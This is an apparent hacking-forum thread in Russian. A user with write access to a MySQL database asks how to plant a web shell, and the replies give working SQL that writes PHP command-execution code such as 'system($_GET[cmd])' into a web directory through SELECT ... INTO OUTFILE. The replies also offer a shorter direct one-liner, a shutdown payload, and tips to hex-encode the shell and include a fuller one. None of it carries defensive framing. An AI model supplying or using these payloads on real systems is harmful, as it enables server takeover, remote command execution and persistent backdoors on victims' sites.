Вот столкнулся с тем, что есть доступ к базе данных. То есть я конекчусь через RST MySQL скрипт к базе, могу удалять, создавать таблицы и т.д. Но мне надо залить шелл, если какие нибудь способы?
Есть Создаем допустим таблицу, в какое нить поле помещаем что-нить типа: <? system ('init 0'); // или любой производный код. ?> SELECT поле INTO OUTFILE "/www/index2.php" FROM таблица; После выполнения запроса формируется файл в указанной дирректории с данными из таблицы
правда там нада разобраться с экранированием символов, типа SELECT поле INTO OUTFILE "/www/index2.php" FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED BY "\n" FROM таблица; // ну эт просто пример...
create table `lamak` (`phpcod` text not null); insert into `lamak` (`phpcod`) values ('<? system($_GET[cmd]);?>'); select phpcod from `lamak` into outfile '/tmp/shell.php'; drop table `lamak`; Только мой тебе совет, гет не используй, лучше поставь инклуд на нормальный веб-шелл.
Хм, зачем создавать таблицу, запихивать в неё код шелла, затем выводить это все в файл, получая шелл, а затем удалять таблицу? На много проще будет сразу записать данные в файл: Code: select '<?php system($_GET["cmd"]); ?>' into outfile '/home/www/ .... /shell.php' Только код шелла советую предварительно запихивать в хексы. А вообще поиск юзать нужно перед созданием темы - обсуждалось и не раз.
